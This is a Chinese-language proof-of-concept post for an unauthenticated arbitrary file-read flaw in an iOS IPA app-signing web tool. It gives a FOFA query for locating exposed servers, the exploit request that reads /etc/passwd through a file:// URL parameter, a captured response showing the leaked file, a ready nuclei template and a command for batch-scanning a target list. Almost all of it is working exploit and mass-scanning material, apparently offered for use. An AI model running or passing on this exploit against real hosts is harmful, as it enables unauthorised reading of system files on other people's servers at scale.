苹果IOS端IPA签名工具任意文件读取漏洞 批量扫描POC

body="/assets/index/css/mobileSelect.css"

/api/index/request_post?url=file:///etc/passwd&post_data=1

GET /api/index/request_post?url=file:///etc/passwd&post_data=1 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Date: Thu, 26 Sep 2024 13:04:12 GMTServer: nginxVary: Accept-Encodingroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

id: apple-ipa-request_post-filereadinfo:  name: 苹果IOS端IPA签名工具任意文件读取漏洞  author: fgz  severity: high  description: '苹果iOS端的IPA签名工具可以一键签名APP分身，支持安装未上架App Store的内测应用。用户可以在线批量导入源，若拥有自己的证书，签名功能完全免费且无任何限制，支持证书导入和文件分享，不限制签名数量。然而，该工具存在任意文件读取漏洞，攻击者可在未经身份验证的情况下访问系统重要文件，从而使网站面临极大的敏感数据泄露风险。'  tags: cve-2024  metadata:    max-request: 1    fofa-query: body="/assets/index/css/mobileSelect.css"    verified: truehttp:  - method: GET    path:      - "{{BaseURL}}/api/index/request_post?url=file:///etc/passwd&post_data=1"    matchers-condition: and    matchers:      - type: status        status:          - 200      - type: word        words:          - "root:x"        condition: and        part: body

nuclei -t apple-ipa-request_post-fileread.yaml -l 1.txt